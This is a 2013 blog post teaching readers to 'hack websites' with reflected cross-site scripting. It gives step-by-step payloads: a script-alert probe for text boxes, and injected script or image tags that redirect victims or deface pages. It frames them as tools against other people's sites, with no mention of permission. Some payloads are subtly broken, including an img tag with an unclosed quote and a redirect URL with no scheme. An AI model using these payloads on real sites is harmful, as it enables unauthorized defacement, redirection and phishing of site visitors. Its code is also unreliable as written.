Sunday, September 15, 2013

Hack websites using Cross Site Scripting XSS






This is the first article on website hacking on my blog. In this tutorial i am going to explain about CROSS SITE SCRIPTING ATTACK.


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.


Types of XSS vulnerabilities:

1.Persistent
2.Non persistent


In this post i am going to explain about the non persistent vulnerability.


Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.


What can a hacker do with this??


XSS Attacks be used for the following:

•Compromising and Hijacking Accounts
•Stealing User Cookies
•Defacing Websites
•Phishing Attacks
•Posting False or Hostile Content


Steps to hack:


Step 1: Find vulnerability.


Step 2: Deface.


Finding out the vulnerability:


1)Find a textbox in the site or something where you can submit text.







2)Type in the following:


<script>alert("hackinginception");</script>


3)If it is vulnerable it should look like this:







Defacing:


There are some ways to deface a site when you find a XSS vulnerability.


1) Makes A Picture Pop-Up:


"><script>location="www.website.com/yourdefacepic";</script>


2) Replace The Content Of The Page By An Image:


<img src="yoursite.com/yourdefacepic/>


3)Redirect To A Website


<script>window.location="http://www.yoursite.com"</script>


NOTE:
Since this is a non-persistent attack,the changes made by you will not affect the website. But the hackers use these vulnerabilities to steal the information of the visitors of those sites.
I will write some articles on those topics soon.


Hope you liked this article... Leave your comments if you have any doubts or suggestions.

No comments:

Post a Comment